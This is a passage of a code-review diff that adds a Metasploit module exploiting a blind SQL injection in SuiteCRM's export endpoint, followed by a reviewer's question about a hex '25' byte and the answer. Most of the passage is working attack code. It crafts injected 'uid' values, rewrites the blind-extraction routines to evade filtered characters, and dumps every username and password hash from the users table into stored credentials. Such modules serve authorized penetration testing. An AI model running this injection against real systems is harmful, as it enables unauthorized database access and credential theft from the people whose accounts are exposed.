modules/auxiliary/scanner/http/suite_crm_export_sqli.rb

```diff
@@ -0,0 +1,210 @@
+      false
+    end
+  end
+
+  def request(uid)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'uri' => normalize_uri(target_uri.path, 'index.php?entryPoint=export'),
+      'encode_params' => false,
+      'vars_post' => {
+        'uid' => uid,
+        'module' => 'Accounts',
+        'action' => 'index'
+      }
+    })
+    res
+  end
+
+  # @return an array of usernames
+  def get_user_names(sqli)
+    print_status 'Fetching Users, please wait...'
+    users_encoded = sqli.run_sql('select to_base64(group_concat(user_name)) from users')
+    Rex::Text.decode_base64(users_encoded).split(',')
+  end
+
+  # Use blind boolean SQL injection to determine the user_hashes of given usernames
+  def get_user_hashes(sqli, users)
+    print_status 'Fetching Hashes, please wait...'
+    hashes = []
+    users.each do |username|
+      hash = sqli.run_sql("select user_hash from users where user_name='#{username}'")
+      hashes << [username, hash]
+      print_good "(#{users.index(username) + 1}/#{users.size}) Username : #{username} ; Hash : #{hash}"
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: username,
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(hash),
+        private_data: hash,
+        service_name: 'SuiteCRM',
+        address: datastore['RHOSTS'],
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+    end
+    hashes
+  end
+
+  def init_sqli
+    wrong_resp_length = request(',\\,))+AND+1=2;+--+')&.body&.length
+    sqli = create_sqli(dbms: MySQLi::BooleanBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      fail_with(Failure::BadConfig, 'comma in payload') if payload.include?(',')
+      length1 = request(",\\,))+OR+(#{payload});+--+")&.body&.length
+      length1 != wrong_resp_length
+    end
+
+    # redefine blind_detect_length and blind_dump_data because of the bad characters the payload cannot include
+
+    def sqli.blind_detect_length(query, _timebased)
+      output_length = 0
+      loop do
+        break if blind_request("length(cast((#{query}) as binary))=#{output_length}")
+
+        output_length += 1
+      end
+      output_length
+    end
+
+    def sqli.blind_dump_data(query, length, _known_bits, _bits_to_guess, _timebased)
+      charset = 32.upto(126).to_a + 32.times.to_a + 127.upto(255).to_a
+
+      # MySQL like operator considers the following characters as wildcards
+      [ '%', '_'].each do |char|
+        charset.delete(char.ord)
+      end
+
+      output = [ ]
+      length.times do |_j|
+        character = charset.detect do |byte|
+          blind_request("(select case when ((#{query})+like+binary "\
+          "0x#{output.map { |e| e.to_s(16).rjust(2, '0') }.join}#{byte.to_s(16).rjust(2, '0')}25)"\
```

Comment:
Why the 25 at the end here?

Reply:
0x25 is the ascii code of the "%" character, `"string" LIKE "str%"` matches (the percentage matches 0 or more characters).